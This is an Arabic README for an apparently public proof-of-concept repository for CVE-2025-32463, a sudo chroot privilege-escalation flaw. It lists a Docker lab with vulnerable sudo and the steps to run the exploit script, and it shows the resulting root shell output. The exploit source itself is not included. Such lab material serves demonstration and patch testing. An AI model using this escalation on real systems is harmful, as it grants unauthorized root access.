
إثبات مفهوم لاستغلال CVE-2025-32463، وهي ثغرة تصعيد صلاحيات في ميزة chroot الخاصة بأداة sudo. يتضمن بيئة Docker وسكربت استغلال لفتح قشرة بصلاحيات الجذر (root).
يوفر هذا المستودع بيئة بسيطة وقابلة لإعادة الإنتاج لإظهار ثغرة تصعيد الامتيازات CVE‑2025‑32463 في ميزة chroot في sudo.
| الملف | الغرض |
|---|---|
| Dockerfile | ينشئ صورة Ubuntu 24.04 مع sudo 1.9.16p2 المعرض للثغرة وأدوات البناء |
| sudo‑chwoot.sh | استغلال إثبات المفهوم الذي يفتح شل جذر داخل chroot |
| run.sh | نص برمجي مساعد يبني الصورة (إذا لزم الأمر) ويشغّل حاوية الاستغلال |
البنى المعرضة للثغرة من sudo 1.9.14 حتى 1.9.17 (جميع مراجعات p) على معظم توزيعات لينكس متأثرة.
# 1 – clone repo
$ git clone https://github.com/pr0v3rbs/CVE-2025-32463_chwoot.git
$ cd CVE-2025-32463_chwoot
# 2 – build and run Docker image (tagged "sudo-chwoot")
$ ./run.sh
# 3 – run exploit in container (drops you into a root shell)
pwn@0da3726bd81f:~$ ./sudo-chwoot.sh
woot!
root@0da3726bd81f:/# id
uid=0(root) gid=0(root) groups=0(root),1001(pwn)
يُمرر run.sh الخيارين --privileged و--rm إلى Docker كي تنظف الحاوية نفسها عند خروجك.
أزل الصورة عندما تنتهي:
docker rmi sudo-chwoot